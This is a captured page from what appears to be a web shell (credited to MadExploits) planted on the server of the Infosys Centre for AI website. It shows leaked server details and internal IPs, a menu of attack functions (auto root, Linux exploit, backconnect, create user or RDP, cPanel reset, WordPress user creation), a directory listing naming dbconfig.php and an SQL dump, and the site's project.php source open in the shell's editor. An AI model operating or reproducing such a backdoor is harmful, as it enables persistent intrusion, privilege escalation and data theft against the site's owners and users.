Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cai /
caiold1 /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-x--x
css
[ DIR ]
drwxr-x--x
docs
[ DIR ]
drwxr-x--x
image
[ DIR ]
drwxr-x--x
images
[ DIR ]
drwxr-x--x
img
[ DIR ]
drwxr-x--x
js
[ DIR ]
drwxr-x--x
lib
[ DIR ]
drwxr-x--x
old
[ DIR ]
drwxr-x--x
scss
[ DIR ]
drwxr-x--x
about.php
10.29
KB
-rwxr-x--x
btech-csai.php
22.84
KB
-rwxr-x--x
cairamjee120523.sql
136.45
KB
-rwxr-x--x
cc-csai.php
12.89
KB
-rwxr-x--x
codeAI.php
11.5
KB
-rwxr-x--x
collaboration.php
8.41
KB
-rwxr-x--x
contact.php
10.95
KB
-rwxr-x--x
courses.php
22.38
KB
-rwxr-x--x
dbconfig.php
1.22
KB
-rwxr-x--x
education.php
8.28
KB
-rwxr-x--x
events.php
24.36
KB
-rwxr-x--x
index.php
23.22
KB
-rwxr-x--x
mediacoverage.php
24.18
KB
-rwxr-x--x
mtech-csai.php
16.85
KB
-rwxr-x--x
people-bkp.php
49.56
KB
-rwxr-x--x
people.php
66.86
KB
-rwxr-x--x
project.php
10.99
KB
-rwxr-x--x
project_old07032022.php
8.86
KB
-rwxr-x--x
publications.php
12.48
KB
-rwxr-x--x
research.php
10.39
KB
-rwxr-x--x
staff.php
8.7
KB
-rwxr-x--x
students.php
23.91
KB
-rwxr-x--x
tab.php
5.43
KB
-rwxr-x--x
talks.php
22.09
KB
-rwxr-x--x
vacancies.php
8.55
KB
-rwxr-x--x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : project.php
<?php require_once 'dbconfig.php'; ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>Infosys Centre for AI</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> <!-- Favicon --> <link href="img/favicon.ico" rel="icon"> <!-- Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500;600&family=Nunito:wght@600;700;800&display=swap" rel="stylesheet"> <!-- Icon Font Stylesheet --> <link href="https://pro.fontawesome.com/releases/v5.10.0/css/all.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> <!-- Libraries Stylesheet --> <link href="lib/animate/animate.min.css" rel="stylesheet"> <link href="lib/owlcarousel/assets/owl.carousel.min.css" rel="stylesheet"> <!-- Customized Bootstrap Stylesheet --> <link href="css/bootstrap.min.css" rel="stylesheet"> <!-- Template Stylesheet --> <link href="css/style.css" rel="stylesheet"> </head> <body> <!-- Navbar Start --> <nav class="navbar navbar-expand-lg bg-white shadow navbar-light sticky-top p-0"> <a href="index.php" class="navbar-brand d-flex align-items-center px-4 px-lg-5"> <h2 class="m-0 text-primary"><img src="img/logo.png" style="width: 70%;"></h2> </a> <button type="button" class="navbar-toggler me-4" data-bs-toggle="collapse" data-bs-target="#navbarCollapse"> <span class="navbar-toggler-icon"></span> </button> <div class="collapse navbar-collapse" id="navbarCollapse"> <div class="navbar-nav ms-auto p-4 p-lg-0"> <a href="index.php" class="nav-item nav-link ">Home</a> <div class="nav-item dropdown"> <a href="research.php" class="nav-link dropdown-toggle active" data-bs-toggle="dropdown">Research</a> <div class="dropdown-menu fade-down m-0"> <a href="publications.php" class="dropdown-item ">Publications</a> <a href="project.php" class="dropdown-item">Projects</a> <a href="collaboration.php" class="dropdown-item">Collaborations</a> </div> </div> <div class="nav-item dropdown"> <a href="!#" class="nav-link dropdown-toggle" data-bs-toggle="dropdown">Education</a> <div class="dropdown-menu fade-down m-0"> <a href="education.php" class="dropdown-item ">Courses</a> <a href="codeAI.php" class="dropdown-item">Code AI</a> </div> </div> <div class="nav-item dropdown"> <a href="!#" class="nav-link dropdown-toggle" data-bs-toggle="dropdown">People</a> <div class="dropdown-menu fade-down m-0"> <a href="people.php" class="dropdown-item ">Faculty</a> <a href="staff.php" class="dropdown-item">Staff</a> <!--<a href="students.php" class="dropdown-item">Students</a>--> </div> </div> <a href="vacancies.php" class="nav-item nav-link ">Jobs</a> <div class="nav-item dropdown"> <a class="nav-link dropdown-toggle" data-bs-toggle="dropdown">Activities</a> <div class="dropdown-menu fade-down m-0"> <a href="talks.php" class="dropdown-item">Talks</a> <a href="events.php" class="dropdown-item ">Events</a> <a href="mediacoverage.php" class="dropdown-item">Media Coverage</a> </div> </div> <a href="contact.php" class="nav-item nav-link">Contact</a> </div> </div> </nav> <!-- Navbar End --> <!-- Header Start --> <div class="container-fluid bg-primary py-5 mb-5 page-header"> <div class="container py-5"> <div class="row justify-content-center"> <div class="col-lg-10 text-center"> <h1 class="display-3 text-white animated slideInDown">Projects</h1> </div> </div> </div> </div> <!-- Header End --> <!-- About Start --> <section class="main-content mb-5 mt-4"> <div class="container"> <div class="row"> <div class="schedule-tab"> <ul class="nav nav-tabs" id="nav-tabs"> <li> <a class="animated active fadeIn" href="#tab_one" data-bs-toggle="tab"> <span class="tab-head"> <span class="tab-text-title">Current</span> </span> </a> </li> <li> <a class="animated fadeIn" href="#tab_two" data-bs-toggle="tab"> <span class="tab-head"> <span class="tab-text-title">Past</span> </span> </a> </li> </ul> <div class="tab-content"> <div class="tab-pane active" id="tab_one"> <div class="row"> <div class="col-sm-12 col-md-12 col-lg-12"> <?php $result = $DB_con->prepare("SELECT * FROM projectdetails where projectStatus='Current' order by makerstamp desc "); $result->execute(); for($i=0; $row = $result->fetch(); $i++){ ?> <div class="hotel-card rounded-lg mb-2 overflow-hidden d-block d-lg-flex box"> <div class="hotel-card_images"> <?php $prImg = $row ['pImg']; if($prImg<>""){ ?> <img src="admin/uploadDoc/<?php echo $row ['pImg']; ?>" class="d-block w-100" alt="<?php echo $row ['projectTitle']; ?>"> <?php } else { ?> <img src="admin/uploadDoc/project.jpg" class="d-block w-100" alt="<?php echo $row ['projectTitle']; ?>"> <?php } ?> </div> <div class="hotel-card_info p-4"> <div class="d-flex align-items-center mb-2"> <h5 class="mb-0 mr-2"><?php echo $row ['projectTitle']; ?></h5> </div> <div class="d-flex justify-content-between align-items-end"> <div class="hotel-card_details"> <div class="text-muted mb-2"><strong>Funding Agency:</strong> <?php echo $row ['fundingAgency']; ?></div> <div class="mb-2"><i class="fa fa-calendar"></i> <strong>Start Date:</strong> <?php echo $row ['startDate']; ?> <i class="fa fa-calendar"></i> <strong>Duration:</strong> <?php echo $row ['endDate']; ?> </div> <div class="text-muted mb-2"><strong>PI: </strong> <?php echo $row ['piDetails']; ?></div> <p><?php echo $row ['description']; ?></p> </div> </div> </div> </div> <?php } ?> </div> </div> </div> <!-- Tab pane 1 end --> <div class="tab-pane" id="tab_two"> <div class="row"> <div class="col-sm-12 col-md-12 col-lg-12"> <?php $result = $DB_con->prepare("SELECT * FROM projectdetails where projectStatus='Past' order by makerstamp desc "); $result->execute(); for($i=0; $row = $result->fetch(); $i++){ ?> <div class="hotel-card rounded-lg mb-2 overflow-hidden d-block d-lg-flex box"> <div class="hotel-card_images"> <?php $prImg = $row ['pImg']; if($prImg<>""){ ?> <img src="admin/uploadDoc/<?php echo $row ['pImg']; ?>" class="d-block w-100" alt="<?php echo $row ['projectTitle']; ?>"> <?php } else { ?> <img src="admin/uploadDoc/project.jpg" class="d-block w-100" alt="<?php echo $row ['projectTitle']; ?>"> <?php } ?> </div> <div class="hotel-card_info p-4"> <div class="d-flex align-items-center mb-2"> <h5 class="mb-0 mr-2"><?php echo $row ['projectTitle']; ?></h5> </div> <div class="d-flex justify-content-between align-items-end"> <div class="hotel-card_details"> <div class="text-muted mb-2"><strong>Funding Agency:</strong> <?php echo $row ['fundingAgency']; ?></div> <div class="mb-2"><i class="fa fa-calendar"></i> <strong>Start Date:</strong> <?php echo $row ['startDate']; ?> <i class="fa fa-calendar"></i> <strong>Duration:</strong> <?php echo $row ['endDate']; ?> </div> <div class="text-muted mb-2"><strong>PI: </strong> <?php echo $row ['piDetails']; ?></div> <p><?php echo $row ['description']; ?></p> </div> </div> </div> </div> <?php } ?> </div> </div> </div> </div> <!-- tab content --> </div> </div> </div> </section> <!-- About End --> <!-- Footer Start --> <div class="container-fluid bg-dark text-light footer pt-5"> <div class="container"> <div class="copyright"> <div class="row"> <div class="col-md-6 text-center text-md-start mb-3 mb-md-0"> <a href="#">Infosys Centre for AI</a>, Copyright © 2016 - Designed & Maintained by IIIT-D Web Admin. </div> <div class="col-md-3 d-flex pt-0"> <a class="btn btn-outline-light btn-social" href=""><i class="fab fa-twitter"></i></a> <a class="btn btn-outline-light btn-social" href=""><i class="fab fa-facebook-f"></i></a> <a class="btn btn-outline-light btn-social" href=""><i class="fab fa-youtube"></i></a> <a class="btn btn-outline-light btn-social" href=""><i class="fab fa-linkedin-in"></i></a> </div> <div class="col-md-3 text-center text-md-end"> <div class="footer-menu"> <a href="index.php">Home</a> <a href="about.php">About Us</a> <a href="contact.php">Contact Us</a> </div> </div> </div> </div> </div> </div> <!-- Footer End --> <!-- Back to Top --> <a href="#" class="btn btn-lg btn-primary btn-lg-square back-to-top"><i class="bi bi-arrow-up"></i></a> <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script> <!-- JavaScript Libraries --> <script src="https://code.jquery.com/jquery-3.4.1.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.0/dist/js/bootstrap.bundle.min.js"></script> <script src="lib/wow/wow.min.js"></script> <script src="lib/easing/easing.min.js"></script> <script src="lib/waypoints/waypoints.min.js"></script> <script src="lib/owlcarousel/owl.carousel.min.js"></script> <!-- Template Javascript --> <script src="js/main.js"></script> <script> $(function () { $('[data-toggle="tooltip"]').tooltip() }) </script> </body> </html>
Close